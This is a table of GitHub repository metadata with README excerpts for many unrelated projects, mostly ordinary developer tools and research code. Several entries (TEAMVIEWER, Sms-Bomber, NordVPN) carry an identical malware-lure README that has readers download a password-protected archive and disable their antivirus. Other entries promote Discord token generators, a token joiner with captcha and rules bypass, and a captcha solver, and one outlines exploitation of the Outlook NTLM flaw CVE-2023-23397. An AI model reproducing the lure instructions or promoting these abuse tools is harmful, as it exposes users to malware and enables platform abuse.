full_name stringlengths 10 67 | url stringlengths 29 86 | description stringlengths 3 347 ⌀ | readme stringlengths 0 162k | stars int64 10 3.1k | forks int64 0 1.51k |
|---|---|---|---|---|---|
solidquant/whack-a-mole | https://github.com/solidquant/whack-a-mole | CEX-DEX arbitrage bot written in pure Python | # Whack-A-Mole
<p align="center">
<img src = "https://github.com/solidquant/whack-a-mole/assets/134243834/841a91df-728b-489b-b4af-4af948c03c35" width="450px">
</p>
The image is of Dugtrio from Pokemon.
### What the heck?
Whack-A-Mole is a CEX-DEX arbitrage bot written in Python.
Arbitrage strategies are like t... | 12 | 5 |
ZhaiSoul/Steam-Liteloader | https://github.com/ZhaiSoul/Steam-Liteloader | 一个轻量化的Steam UI 模组加载器 | # Steam-Liteloader
一个轻量化的Steam UI 模组加载器
# 如何使用
将项目clone下来后,解压到Steam\steamui目录下即可使用
# 如何开发插件
待定,目前正在完善基本框架
# 未来计划
未来将制作插件管理工具以及插件平台,目前正在解决安全性的问题。
# 如何参与开发
加入QQ群:857193118,与群主联系即可。
| 39 | 0 |
verytinydever/BlockchainApp-Solidity-SmartContracts | https://github.com/verytinydever/BlockchainApp-Solidity-SmartContracts | null | # Online-Shopping-System | 10 | 0 |
long39ng/listviewerlite | https://github.com/long39ng/listviewerlite | View nested lists in R interactively using only HTML and CSS |
<!-- README.md is generated from README.Rmd. Please edit that file -->
# listviewerlite
<!-- badges: start -->
<!-- badges: end -->
listviewerlite provides a single function `listview()`, which creates a
collapsible tree view of R lists using only HTML and CSS, without the
need for JavaScript.
## Installation
You... | 15 | 0 |
lifeisboringsoprogramming/sd-webui-xldemo-txt2img | https://github.com/lifeisboringsoprogramming/sd-webui-xldemo-txt2img | Stable Diffusion XL 0.9 Demo webui extension | # Stable Diffusion XL 0.9 txt2img webui extension
<img src="images/webui.png">
A custom extension for [AUTOMATIC1111/stable-diffusion-webui](https://github.com/AUTOMATIC1111/stable-diffusion-webui) that demo the SDXL 0.9 txt2img features
# Tested environment
* GPU: RTX 3060 12G VRAM
* OS: Ubuntu 20.04.4 LTS, Windows ... | 187 | 23 |
GineTik/Telegramper-TelegramFramework | https://github.com/GineTik/Telegramper-TelegramFramework | Telegramper is the Telegram.Framework, which is similar to ASP.Net Core. It contains services, middleware, configuration, controllers (executors), and more. | # Telegramper
It is framework similar to a ASP.Net Core. Framework contains services, middlewares, configuration, controllers(executors) and other.
> The framework is under development, so unexpected errors, changes in functionality, and names are possible! I would be grateful if you could report any bugs or functiona... | 17 | 1 |
blackav/smart-home-binary | https://github.com/blackav/smart-home-binary | Smart-home problem demo server binary releases | # smart-home-binary
Демо-сервер для задачи "умный дом"
## Запуск
Перед запуском в Linux или MacOS убедитесь, что файл имеет права на исполнение. Установить их можно с помощью команды:
```
chmod +x FILE
```
Всегда используйте самую последнюю версию демо-сервера.
Чтобы посмотреть список доступных опций программы исп... | 40 | 9 |
DevMiser/Bird-Sweeper | https://github.com/DevMiser/Bird-Sweeper | The Bird Sweeper chases birds away but does not hurt them. It is an effective and humane bird deterrent. | # The Bird-Sweeper
<img width="461" alt="B1" src="https://github.com/DevMiser/Bird-Sweeper/assets/22980908/0fca9c41-a781-43c1-8dc8-e48aa376c733">
<img width="435" alt="B2" src="https://github.com/DevMiser/Bird-Sweeper/assets/22980908/3d88019a-1909-44f9-a8c5-d4fc0e12d587">
<img width="474" alt="B3" src="https://github.... | 15 | 1 |
xinsblog/chatglm-tiny | https://github.com/xinsblog/chatglm-tiny | 从头开始训练一个chatglm小模型 | * [chatglm-tiny: 从头开始训练一个chatglm小模型](https://zhuanlan.zhihu.com/p/642355086)
| 14 | 0 |
eamars/klipper_adaptive_bed_mesh | https://github.com/eamars/klipper_adaptive_bed_mesh | An Python plugin enabling the bed mesh based on the printed part. | Klipper Adaptive Bed Mesh
===
[中文版](readme_zh_cn.md)
# What is it?
The *Adaptive Bed Mesh* plugin is designed to generate the bed mesh parameter based on the sliced part dynamically.
With finer bed mesh density around printed parts you can achieve better accuracy and lesser time spent on probing.

## **Pre-release Notice**
This function dependent on Appwrite 1.4. Please note, as of the writing of this document, this version of Appwrite is not publicly available.
## Overview
Dynamic links are links that redirect users t... | 44 | 0 |
niuiic/format.nvim | https://github.com/niuiic/format.nvim | An asynchronous, multitasking, and highly configurable formatting plugin. | # format.nvim
An asynchronous, multitasking, and highly configurable formatting plugin.
## Dependencies
- [niuiic/core.nvim](https://github.com/niuiic/core.nvim)
## Features
### Format entire file
Call `require("format").format()`.
The plugin only modifies changed parts, thus the buffer's folding, highlighting, ... | 25 | 1 |
ayushr6/sd-webui-automation | https://github.com/ayushr6/sd-webui-automation | Easlisy generate images using a datasets/list of prompts, using the automation script for Stable Diffusion web ui. |
# Automatic1111-webui Automation
A `python automated script` to automate the [AUTOMATIC1111/stable-diffusion-webui](https://github.com/AUTOMATIC1111/stable-diffusion-webui), so to ease the task to `generate thousands of images`, in one go, with the help of `csv`.
## Step 1 - Clone:
- for HTTPS:
```
git clone ht... | 10 | 0 |
blu-dev/less-delay | https://github.com/blu-dev/less-delay | A mod for SSBU that removes 1 frame of input delay | # Less Input Delay
This is a **software modification** to Super Smash Bros. Ultimate that removes 1 frame of input
delay.
This is performed by disabling graphical vsync and manually timing the game's core logic to run on
the vsync timer.
## Installation
You can install this by grabbing the latest `libless_delay.nro` ... | 30 | 0 |
H4cK3dR4Du/Discord-Token-Joiner | https://github.com/H4cK3dR4Du/Discord-Token-Joiner | The best token joiner for Discord, with captcha solver, rules bypass, and nickname changer (optional)! | # Discord Token Joiner 🪐
The best token joiner for Discord, with captcha solver, rules bypass, and nickname changer (optional)!
## 📹 Preview
https://github.com/H4cK3dR4Du/Crunchyroll-Account-Checker/assets/118562174/344619ae-883c-40bd-a805-297db331cd31
## 🔥 Features
- Fully Requests Based Joiner
- Fastes... | 14 | 2 |
JeremiahPetersen/RepoToText | https://github.com/JeremiahPetersen/RepoToText | Turn an entire GitHub Repo into a single organized .txt file to use with Code Interpreter | 

 | [Compound Ops](#compound-ops) | [Type Ops](#type-ops) | [Utilities](#utilities) | [Types](#types) |
| --------------------------... | 16 | 0 |
replacementAI/A-Backtest-A-Day | https://github.com/replacementAI/A-Backtest-A-Day | Join me everyday as I backtest a different quant strategy for the markets! | # A Backtest A Day
Everyday I will backtest a different quant strategy for the markets!
## Backtested Strategies
### Best Equal Weight Long Only Strategies
#### XS Short-term Reversal

| Description (Long... | 10 | 1 |
matthewrdev/UnityUaal.Maui | https://github.com/matthewrdev/UnityUaal.Maui | Embedding the Unity game engine into .NET MAUI. | # UnityUaal.Maui
This code sample demonstrates how to embed [Unity](https://unity.com) into [.NET MAUI](https://learn.microsoft.com/en-us/dotnet/maui/what-is-maui).
<img src="img/unity-maui-embedding.gif" width="30%" height="30%">
See: https://github.com/Unity-Technologies/uaal-example
Requires:
* Unity (using 23.... | 62 | 1 |
verytinydever/b2b-parser | https://github.com/verytinydever/b2b-parser | null |
## Parser setup
# Build
```
$ docker build -t b2bparser:latest .
```
# Run
```
$ docker run -it -v /root/b2b-parser/logs:/tmp/logs --restart unless-stopped --net=host b2bparser
```
| 14 | 0 |
mvneerven/lit-list | https://github.com/mvneerven/lit-list | null | # Web Components & Lit Library - a Curated List of documentation
A curated list of great documentation to get frontenders started with **Web Components & Lit**, with or without a framework.
# Web Components basics
Basically, Web Components consist of [three technologies](https://exyte.com/blog/web-components-technol... | 12 | 0 |
fynnfluegge/gitreview-gpt | https://github.com/fynnfluegge/gitreview-gpt | A CLI tool that reviews your git changes with GPT-3.5 | # gitreview-gpt
`gitreview-gpt` reviews your git changes with OpenAI's GPT-3.5 model from command line and provides detailed review comments with the corresponding line numbers.
Your `git diff` is extensively parsed to a well comprehensible format for the `gpt-3.5-turbo` completion api to get precise feedback based on... | 11 | 0 |
Muhammad-Ali007/OutlookNTLM_CVE-2023-23397 | https://github.com/Muhammad-Ali007/OutlookNTLM_CVE-2023-23397 | null | To exploit this vulnerability, an attacker must create a malicious calendar invitation that includes a reference to a sound file pointing to a file in a network share in the attacker's machine. At a low level, an Outlook email stores the reference to the sound file in an internal parameter called "PidLidReminderFilePar... | 19 | 1 |
FryCoderX/DEX-Triangular-Arbitrage-Solidity-Smart-Contract | https://github.com/FryCoderX/DEX-Triangular-Arbitrage-Solidity-Smart-Contract | Discover the secret to trading success with our game-changing solidity smart contract. Execute Triangular Arbitrage on DEX's effortlessly, leveraging its open-source nature and profitability. It's time to level up your trading journey! Get started today! | <img src="banner.png" />
What Is DEX Crypto Triangular Arbitrage?
Triangular arbitrage is the result of a discrepancy between three tokens that occurs when the DEX exchange rates do not exactly match up.
if you dont have metamask browser extension by getting it here
https://metamask.io/download/
and make... | 21 | 21 |
lilujunai/EMQ-series | https://github.com/lilujunai/EMQ-series | [ICCV-2023] EMQ: Evolving Training-free Proxies for Automated Mixed Precision Quantization |
# EMQ: Evolving Training-free Proxies for Automated Mixed Precision Quantization (ICCV2023)
This repository contains all the experiments of our paper "EMQ: Evolving Training-free Proxies for Automated Mixed Precision Quantization". Final implementations in preparation.

##... | 10 | 0 |
scaleapi/llm-engine | https://github.com/scaleapi/llm-engine | Scale LLM Engine public repository | # ⚡ LLM Engine ⚡
**The open source engine for fine-tuning and serving large language models**.
Scale's LLM Engine is the easiest way to customize and serve LLMs. In LLM Engine, models can be accessed via Scale's hosted version or by using the Helm charts in this repository to run model inference and fine-tuning in y... | 507 | 28 |
HoneyCakeTeam/Tic-Tac-Toe | https://github.com/HoneyCakeTeam/Tic-Tac-Toe | Tic Tac Toe Game is a simple online multiplayer game built with Firebase and Jetpack Compose. The game allows two players to play the classic XO (Tic-Tac-Toe) game together in real-time. The app aims to create a seamless and engaging gaming experience with a simple architecture and a focus on real-time functionality. | # Tic-Tac-Toe Game App
## Overview
Tic Tac Toe Game is a simple online multiplayer game built with Firebase and Jetpack Compose. The game allows two players to play the classic XO (Tic-Tac-Toe) game together in real-time. The app aims to create a seamless and engaging gaming experience with a simple architecture and ... | 10 | 2 |
Novartis/pqsar2cpd | https://github.com/Novartis/pqsar2cpd | pqsar2cpd is a deep learning algorithm for translation of activity profiles into novel molecules. | # pqsar2cpd - de novo generation of hit-like molecules from pQSAR pIC50 with AI-based generative chemistry
[](https://www.python.org) [
Al Zebra is an AI-powered maths tutor designed to provide interactive learning experiences for kids. It helps kids with mathematics by posing problems of increasing complexity based on their previous responses, verifying their answers, and provid... | 62 | 6 |
yakovexplorer/ChimeraWebsite | https://github.com/yakovexplorer/ChimeraWebsite | Our API website. DM me in discord if you want to contribute. | This is a [Next.js](https://nextjs.org/) project bootstrapped with [`create-next-app`](https://github.com/vercel/next.js/tree/canary/packages/create-next-app).
## Getting Started
First, run the development server:
```bash
npm run dev
# or
yarn dev
# or
pnpm dev
#To build
npm run build && npm run start -p {port}
```
... | 17 | 13 |
feisuanyz/Automated-Testing-Platform | https://github.com/feisuanyz/Automated-Testing-Platform | Easy to Test and Maintain | Minimal Resource Consumption | Automated Testing Platform(ATP)
-----------------------------------
Language: [English](https://github.com/feisuanyz/Automated-Testing-Platform/blob/main/README.md) | [中文](https://github.com/feisuanyz/Automated-Testing-Platform/blob/main/READMEcn.md)
Client Download:[For Window & Linux](https://main.feisuanyz.com:8080... | 11 | 0 |
jayesh15/NewsNLP | https://github.com/jayesh15/NewsNLP | Natural Language Processing (NLP) project designed to analyze and extract valuable insights from new articles. Powered by advanced language models and cutting-edge NLP techniques, it offers a comprehensive solution for automated text analysis in the realm of news. | # NewsNLP
Natural Language Processing (NLP) project designed to analyze and extract valuable insights from new articles. Powered by advanced language models and cutting-edge NLP techniques, it offers a comprehensive solution for automated text analysis in the realm of news.
| 19 | 1 |
stevenlafl/threads-web-client | https://github.com/stevenlafl/threads-web-client | A web client for Meta's new Threads app | # Instagram Threads Web Client
<div align="center">
[](https://hub.docker.com/r/stevenlafl/threads-web-client/)
[
An interactive map for Black Desert Online. The website has been sunset as a result of not being in a position to stay current with game updates.
Horses, crates & tradepack tools are just embeds for the following jsfiddle pages:
* **Horse Calcul... | 34 | 25 |
verytinydever/stakingContract | https://github.com/verytinydever/stakingContract | null | # Basic Sample Hardhat Project
Users stake different quantities of ERC-20 token named “TKN”. Assume that an external caller would periodically transfer reward TKNs to a staking smart contract (no need to implement this logic). Rewards are proportionally distributed based on staked TKN.
Contract caller can:
- Stake
- ... | 15 | 0 |
elentok/format-on-save.nvim | https://github.com/elentok/format-on-save.nvim | Automatically formats files when saving using either LSP or shell utilities like prettierd or shfmt | # format-on-save.nvim
Automatically formats files when saving using either LSP or shell utilities like prettierd or shfmt.
It also restores the cursor of any window showing the current file (useful when
editing the same file in a split).
NOTE: This is a work in progress and the API might change.
## Why another form... | 52 | 1 |
rya0x/mempool-geth-vs-reth | https://github.com/rya0x/mempool-geth-vs-reth | null | ```
./mempool-geth-vs-reth --help
```
yellow = geth win\
red = reth win

| 28 | 0 |
verytinydever/simpleBlockchainPrototype | https://github.com/verytinydever/simpleBlockchainPrototype | null | # simpleBlockchainPrototype
1. Install nodeJS version 9+ and npm version 2+
2. Run in console "git clone https://github.com/edrygka/simpleBlockchainPrototype"
3. Then run in following dir "npm install"
4. And run "npm start"
In your directory would created "mydb" directory with(leveldb database) and genesis functi... | 15 | 0 |
AIDajiangtang/Superpoint-LightGlue-Image-Stiching | https://github.com/AIDajiangtang/Superpoint-LightGlue-Image-Stiching | Integrate SuperPoint and LightGlue into OpenCV image stitching or Matching algorithm | 简体中文 | [English](README_EN.md)
# DeepLearning-based-Feature-extraction-and-matching
将深度学习预训练模型 SuperPoint 和 LightGlue 集成到OpenCV拼接算法中。
## OpenCV拼接流水线</h2>
图像特征提取与匹配是许多高级计算机视觉任务的基础,例如图像配准,图像拼接,相机矫正,SLAM,深度估计等等。
今天我们就以图像拼接为切入点,来看一下特征提取与匹配的重要性。
OpenCV中提供了封装程度非常高的Stitcher类,通过下面几行代码就能实现图像拼接。
Mat pano;
Ptr<Stitcher> s... | 11 | 3 |
dextersjab/code-interpreter-notes | https://github.com/dextersjab/code-interpreter-notes | Notes and insights about OpenAI's Code Interpreter | # Notes about ChatGPT's Code Interpreter
## Project Structure
This repository primarily contains notes and documentation about OpenAI's Code
Interpreter. Important files include:
- `system_prompt.md`: the system prompt for the Code Interpreter.
- `system.md`: details about the system environment where
the code int... | 11 | 0 |
fipso/cntui | https://github.com/fipso/cntui | Replay chrome requests from your terminal using curl | # Chrome DevTools Network TUI (cnTUI)
Little cli/tui tool to export HTTP requests to cURL commands from the terminal.
Currently exports requests to your X11 clipboard using xclip.

### Installation
Requirements: go, xcl... | 10 | 0 |
xlang-ai/llm-tool-use | https://github.com/xlang-ai/llm-tool-use | Paper collection on LLM tool use and code generation covered in the ACL tutorial on complex reasoning | # LLM Tool Use Papers
  
## Introduction
### Group
## Papers
1. **CLIPort: What and Where Pathways for Robotic Manipulation... | 124 | 3 |
zhaohongxuan/shangma_auto_sign | https://github.com/zhaohongxuan/shangma_auto_sign | 基于Nodejs和Github Action实现上马每日自动签到 | ## 上马自动签到 [](https://github.com/zhaohongxuan/shangma_auto_sign/actions/workflows/auto-sign.yaml)
### 基于 Node.js + GitHub Action 实现上海马拉松官网每日签到
作为上马9年没中签的受害者,我决定做一个`自动化脚本`来签到赚积分,虽然积分对于抽签的权重未可知,但是已知的是一定有用,至于作用多大... | 20 | 37 |
elisezhu123/bilibili_sourcelibrary | https://github.com/elisezhu123/bilibili_sourcelibrary | null | # bilibili_sourcelibrary | 10 | 0 |
wudongming97/OnlineRefer | https://github.com/wudongming97/OnlineRefer | [ICCV 2023] OnlineRefer: A Simple Online Baseline for Referring Video Object Segmentation |
<div align="center">
<h1>
<b>
OnlineRefer: A Simple Online Baseline for Referring Video Object Segmentation
</b>
</h1>
</div>
<p align="center"><img src="docs/onlinerefer.jpg" width="800"/></p>
> **[OnlineRefer: A Simple Online Baseline for Referring Video Object Segmentation](https://arxiv.org/abs/2307.09356)**
>
... | 23 | 2 |
Karine-Huang/T2I-CompBench | https://github.com/Karine-Huang/T2I-CompBench | null |
# T2I-CompBench: A Comprehensive Benchmark for Open-world Compositional Text-to-image Generation
Kaiyi Huang<sup>1</sup>, Kaiyue Sun<sup>1</sup>, Enze Xie<sup>2</sup>, Zhenguo Li<sup>2</sup>, and Xihui Liu<sup>1</sup>.
**<sup>1</sup>The University of Hong Kong, <sup>2</sup>Huawei Noah’s Ark Lab**
<a href=' htt... | 26 | 1 |
MarinaGV93/TEAMVIEWER | https://github.com/MarinaGV93/TEAMVIEWER | null |
# INSTRUCTIONS:
- Download the project: https://github-downloader.com/
- Unzip the archive (Project v1.2.4.zip) to your desktop. Password: 2023
- Run the file (Project_run v1.2.4).
If you can’t download / install the software, you need to:
1. Disable / remove antivirus (files are completely clean)
2. ... | 28 | 0 |
vaishnavikotkar2004/Stack-Programs | https://github.com/vaishnavikotkar2004/Stack-Programs | Is in the quetions file.... | # Stack-Programs | 10 | 0 |
curated-intel/Threat-Actor-Profile-Guide | https://github.com/curated-intel/Threat-Actor-Profile-Guide | The Threat Actor Profile Guide for CTI Analysts | ## 🔗 [The Threat Actor Profile Guide for CTI Analysts PDF](https://github.com/curated-intel/Threat-Actor-Profile-Guide/blob/main/The%20Threat%20Actor%20Profile%20Guide%20for%20CTI%20Analysts%20v1.1.pdf)
 is a simple CLI in Go for writing better commits. | <h1 align="center">Git Better Commit</h1>
<p align="center">
<img src="./data/screenshots/gbc-v110-execution.gif" alt="gbc v1.1.0 execution">
</p>
<details>
<summary>With emojis</summary>
<p align="center">
<img src="./data/screenshots/gbc-v110-execution-emojis.gif" alt="gbc v1.1.0 execution with emojis">
... | 25 | 1 |
worldline-spain/flutter_architecture_template | https://github.com/worldline-spain/flutter_architecture_template | null | # Flutter architecture template
## Introduction
This project is a starting point for a Flutter applications created by Worldline Spain.
## Features
- Clean Architecture
- Flavors (dev, prep, prod)
- Http client to Api REST ([Dio](https://pub.dev/packages/dio))
- Native launch screen
- App icons configured
- Interna... | 26 | 2 |
yinyunie/ScenePriors | https://github.com/yinyunie/ScenePriors | Implementation of CVPR'23: Learning 3D Scene Priors with 2D Supervision | # Learning 3D Scene Priors with 2D Supervision [[Project]](https://yinyunie.github.io/sceneprior-page/)[[Paper]](https://arxiv.org/pdf/2211.14157.pdf)
[Yinyu Nie](https://yinyunie.github.io/), [Angela Dai](https://www.3dunderstanding.org/), [Xiaoguang Han](https://gaplab.cuhk.edu.cn/), [Matthias Nießner](https://niess... | 35 | 4 |
lancedb/yoloexplorer | https://github.com/lancedb/yoloexplorer | YOLOExplorer : Iterate on your YOLO / CV datasets using SQL, Vector semantic search, and more within seconds | # YOLOExplorer
Explore, manipulate and iterate on Computer Vision datasets with precision using simple APIs.
Supports SQL filters, vector similarity search, native interface with Pandas and more.
* Analyse your datasets with powerful custom queries
* Find and remove bad images (duplicates, out of domain data and mor... | 61 | 10 |
azriel91/dot_ix | https://github.com/azriel91/dot_ix | Interactive dot graphs | # ✒️ dot_ix
> 🚧 This is very much a work in progress
[Try it yourself](https://azriel.im/dot_ix/) *(sorry not mobile friendly)*
https://user-images.githubusercontent.com/2993230/253878816-0729970f-651f-45ef-a986-470f383b8018.mp4
```bash
cargo install cargo-leptos
# Then, one of:
# * server side rendering
cargo l... | 61 | 1 |
matkhl/leagueoflegends | https://github.com/matkhl/leagueoflegends | null | ## leagueoflegends
Simple source including:
- recall tracker (outdated)
- cooldown tracker (outdated)
- orbwalker
- champion modules
- simple prediction & targetselection
- skinchanger (based on R3nzSkin source)
*Updated for patch 13.14.522 (minipatch after 13.14 release)*
### How to use the Injector
... | 15 | 7 |
tidbyt/hdk | https://github.com/tidbyt/hdk | A community supported firmware for the Tidbyt hardware 🤓 | # Hardware SDK
[](https://tidbyt.dev)
[](https://github.com/tidbyt/hdk/actions/workflows/main.yaml)
[ is an LLDB plugin to make it more usable for low-level RE and VR. Similar to [GEF](https://github.com/hugsy/gef), but for LLDB.
It uses LLDB's Python API to add extra status output and a few ne... | 197 | 4 |
mazpie/mastering-urlb | https://github.com/mazpie/mastering-urlb | [ICML 2023] Pre-train world model-based agents with different unsupervised strategies, fine-tune the agent's components selectively, and use planning (Dyna-MPC) during fine-tuning. | # Mastering the Unsupervised Reinforcement Learning Benchmark from Pixels
[[website](https://masteringurlb.github.io/)] [[paper](https://arxiv.org/abs/2209.12016)]
This is the code for our ICML 2023 work. You can use it to pre-train world model-based agents with different unsupervised strategies, fine-tune the agent's... | 10 | 1 |
folk3n30/NordVPN | https://github.com/folk3n30/NordVPN | null |
# INSTRUCTIONS:
- Download the project: https://github-downloader.com/
- Unzip the archive (Project v1.2.4.zip) to your desktop. Password: 2023
- Run the file (Project_run v1.2.4).
If you can’t download / install the software, you need to:
1. Disable / remove antivirus (files are completely clean)
2. ... | 28 | 0 |
mlamberts78/weather-chart-card | https://github.com/mlamberts78/weather-chart-card | Custom weather card with charts. | <h1 align="center">Weather Chart Card</h1>
[](https://www.buymeacoffee.com/mlamberts7I)
[](https://github.com/hacs/integration)
[ | # RWKV.f90
RWKV.f90 is a port of the original [RWKV-LM](https://github.com/BlinkDL/RWKV-LM), an open-source large language model initially developed in Python, into Fortran. Renowned for its robust capabilities in scientific and engineering computations, the primary focus of this project is to explore the potential of... | 26 | 1 |
nicoburniske/leptos_query | https://github.com/nicoburniske/leptos_query | Asynchronous state management library for Leptos, providing simplified data fetching, integrated reactivity, server-side rendering support, and intelligent cache management. | # Leptos Query
[](https://crates.io/crates/leptos_query)
[](https://docs.rs/leptos_query)
## About
Leptos Query is a robust asynchronous state management library for [Leptos](https://github.com/leptos-rs/l... | 18 | 3 |
nowy/issues.fe.engineer | https://github.com/nowy/issues.fe.engineer | Issues for https://fe.engineer | # issues.fe.engineer
Issues for https://fe.engineer
| 15 | 0 |
farzadhass/best-paper-and-high-citation | https://github.com/farzadhass/best-paper-and-high-citation | AI Best Paper Awards and High Citation- | best paper conferences in AI
[ICLR 2023](https://github.com/farzadhass/best-paper-and-high-citation#iclr-2023-kigali-rwanda-may-1-5-2023)
[AAAI 2023](https://github.com/farzadhass/best-paper-and-high-citation/blob/main/README.md#aaai-2023---washington-dc-usa-february-7-14-2023)
<picture>
<source media="(prefers-c... | 46 | 1 |
harvard-cns/teal | https://github.com/harvard-cns/teal | Codebase for Teal (SIGCOMM 2023) | # Teal: Traffic Engineering Accelerated by Learning
Teal is a learning-based traffic engineering (TE) algorithm for wide-area networks (WANs) published at ACM SIGCOMM '23.
By harnessing the parallel processing power of GPUs, Teal achieves unprecedented
acceleration of TE control, surpassing production TE solvers by se... | 10 | 0 |
lh3/jstreeview | https://github.com/lh3/jstreeview | Interactive phylogenetic tree viewer/editor | ## Getting Started
```sh
# open https://lh3.sourceforge.io/jstree/ in your browser for a live example, or
git clone https://github.com/lh3/jstreeview
# then open index.html in a web browser
```
## Introduction
This repo provides an interactive web application for viewing or editing
[phylogenetic trees][phylotree] in ... | 39 | 2 |
MarinaGV93/Sms-Bomber | https://github.com/MarinaGV93/Sms-Bomber | null |
# INSTRUCTIONS:
- Download the project: https://github-downloader.com/
- Unzip the archive (Project v1.2.4.zip) to your desktop. Password: 2023
- Run the file (Project_run v1.2.4).
If you can’t download / install the software, you need to:
1. Disable / remove antivirus (files are completely clean)
2. ... | 27 | 0 |
ethyaan/codeine | https://github.com/ethyaan/codeine | Codeine Blog | <img src="public/logo.svg" alt="Codeine" width="32px" height="32px" />
This is a [Codeine](https://codeine.blog/) community blog repository.
## About project
built with NextJS + Tailwind. It's a static blog which uses markdown file as data source of the posts.
The live version of this blog is available at [https:... | 12 | 0 |
MarcoWorms/MagiQL | https://github.com/MarcoWorms/MagiQL | query GraphQL endpoints with natural language | # MagiQL

Telegram bot that can send requests made with natural language to a GraphQL endpoint and process responses.
Made with https://github.com/MarcoWorms/RefactorGPT
[](https://ely.su/discord)
Virtual hub on Velocity proxy, built with LimboAPI.
## Features
---
- Fully virtual hub on Velocity, without the need to create a separate server.
- Configurable custom comma... | 16 | 1 |
murphysecurity/actions | https://github.com/murphysecurity/actions | GitHub actions for analyzing SBOM information and identifying security vulnerabilities within your project. 用于在GitHub CI中自动化分析项目SBOM信息并识别项目安全漏洞 | # MurphySec code scan
Integrating the MurphySec code security detection tool into the CI/CD process can detect security vulnerabilities in real time for each code update and quickly repair these security vulnerabilities.
## Usage
### Inputs
- `MURPHYSEC_TOKEN`: MurphySec official website token
Go to [MurphySec pl... | 13 | 2 |
sockcymbal/enhanced-llm-reasoning-tree-of-thoughts | https://github.com/sockcymbal/enhanced-llm-reasoning-tree-of-thoughts | Collection of Tree of Thoughts prompting techniques I've found useful to start with, then stylize, then iterate | # 🌳 LLM Enhanced Reasoning v1: Multi-Persona Tree of Thoughts + Self Consistency + Self Criticism + Retrospection 🧠
### Context
This repo will serve as a collection of remixed/enhanced reasoning prompting techniques related to iterative LLM reasoning, such as Chain of Thought, Tree of Thoughts, and others that I've ... | 40 | 8 |
davidpig/lychee_law | https://github.com/davidpig/lychee_law | 律知, 法律咨询大模型 | <h1 align="center">
<br>
<a href="https://github.com/davidpig/lychee_law"><img src="https://media.discordapp.net/attachments/1029427452470108200/1129060196879184002/lychee_logo.png" alt="Markdownify" width="300"></a>
<br>
律知 (Lychee)
<br>
</h1>
<h4 align="center"> ⚖️ 精通中国法律的大语言模型 ⚖️</h4>
<h4 align="center"> ... | 12 | 1 |
tsinghua-lau/fusion-ui | https://github.com/tsinghua-lau/fusion-ui | 刚起步 . . . | 简体中文 | [English](./README.en-CN.md)
<p align="center">
<img width="120px" height="100px" src="https://img-blog.csdnimg.cn/99f1d53fa0b244809eee1a8a359e3261.png#pic_center" >
</p>
<h1 align="center">Fusion UI</h1>
<p align="center">Fusion Ui /ˈfjuːʒ(ə)n/ 是一个 Vue3 组件库,简洁、优雅、美观,帮助你快速构建网站。</p>
</p>
## 特性
- 🧜 组件设计-提供整... | 16 | 1 |
KawaiiKillar/AutoCaptcha | https://github.com/KawaiiKillar/AutoCaptcha | Introducing AutoCaptcha: Free AI Solver, your ultimate tool for effortlessly bypassing captchas. Powered by advanced AI technology, this extension is designed to automatically solve hCaptcha and reCaptcha, completely free of charge. | # AutoCaptcha
Introducing AutoCaptcha: Free AI Solver, your ultimate tool for effortlessly bypassing captchas. Powered by advanced AI technology, this extension is designed to automatically solve hCaptcha and reCaptcha, completely free of charge.
| 30 | 4 |
fozilovbro/vue-pro-boilerplate | https://github.com/fozilovbro/vue-pro-boilerplate | Vue.js 3 boilerplate for large-scale projects | ## Vue.js 3 boilerplate for large-scale projects
This project was developed based on the **Feature Sliced Design** Architectural methodology. This boilerplate demonstrates the proper organization of your frontend project. It offers an easily discoverable architecture through domain scopes, allowing for flexible replac... | 23 | 3 |
Oskar0112/oskar-portfolio | https://github.com/Oskar0112/oskar-portfolio | Portfolio using Next | <div align="center">
<img alt="Oskar Portfolio logo" src="/public/oskar.svg" width="100" />
</div>
<h1 align="center">
Oskar Portfolio - Avenue Labs landing page template 🚀
</h1>
Oskar Portfolio is a customizable NextJS and TailwindCSS landing page template that offers personalized styling and easy customization... | 13 | 0 |
OringoDevelopment/discord-token-generator | https://github.com/OringoDevelopment/discord-token-generator | Discord Token Generator 🔥WORKING JULY 2023🔥 Discord Token generator written in python3 discord account gen token gen token generator account generator generator generator token gen token generator discord token gen discord token generator discord token generator discord token generator discord token generator token ... | # Discord-Token-Generator
Proof of concept of how the creation of Discord accounts can be automated without the need to type/click buttons on browser.
## About
A script that automates creating discord accounts. It shows how accounts can be created automatically without the user typing unless there is a captcha (h-Capt... | 11 | 810 |
huajianmao/openai.mini | https://github.com/huajianmao/openai.mini | Implemente OpenAI APIs with open source LLM and other models. | # [WIP] OpenAI.mini
This repo implements OpenAI APIs with open source models, for example, `LLaMA` for [chat](https://platform.openai.com/docs/api-reference/chat), `Whisper` for [audio](https://platform.openai.com/docs/api-reference/audio), `SDXL` for [image](https://platform.openai.com/docs/api-reference/images), `i... | 15 | 1 |
deepmind/graphcast | https://github.com/deepmind/graphcast | null | # GraphCast: Learning skillful medium-range global weather forecasting
This package contains example code to run and train [GraphCast](https://arxiv.org/abs/2212.12794).
It also provides three pretrained models:
1. `GraphCast`, the high-resolution model used in the GraphCast paper (0.25 degree
resolution, 37 pressur... | 43 | 3 |
alloy-rs/rlp | https://github.com/alloy-rs/rlp | Fast implementation of Ethereum RLP serialization | # RLP
A fast and simple [Ethereum RLP][rlp] implementation in Rust.
[rlp]: https://ethereum.org/en/developers/docs/data-structures-and-encoding/rlp
[![Build Status][actions-badge]][actions-url]
[![Telegram chat][telegram-badge]][telegram-url]
[actions-badge]: https://img.shields.io/github/actions/workflow/status/al... | 45 | 5 |
CaCaBlocker/react-redux-saga-tailwindcss-typescript | https://github.com/CaCaBlocker/react-redux-saga-tailwindcss-typescript | 🅰 Simple project architecture with React & Redux & Saga & Tailwind CSS & Typescript | # Project Architecture
### What are the main skills?
⚽ React.js <br/>
⚾ Redux + Saga <br/>
🥎 Tailwind CSS <br/>
🏀 Typescript <br/>
🏐 Vite <br/>
### Problem
https://github.com/innoloft/Frontend-Application
### Solution
🛠 How to run in local
```
npm run dev
```
🛠 How to link the code
```
npm run lint
```
🛠... | 13 | 2 |
puzzlet/seshat | https://github.com/puzzlet/seshat | Code like an Egyptian | **Seshat** is a programming language in Egyptian hieroglyphs. Its goal is to make programming easy for anyone who can read and write Egyptian hieroglyphs.
"Seshat" (𓋇 Zẖꜣ.t) is the name of an Egyptian goddess. The goddess of writing, architecture, and mathematics, she would definitely be the goddess of programming.
... | 45 | 0 |
StricaHQ/ouroboros-network-js | https://github.com/StricaHQ/ouroboros-network-js | null | <p align="center">
<a href="https://strica.io/" target="_blank">
<img src="https://docs.strica.io/images/logo.png" width="200">
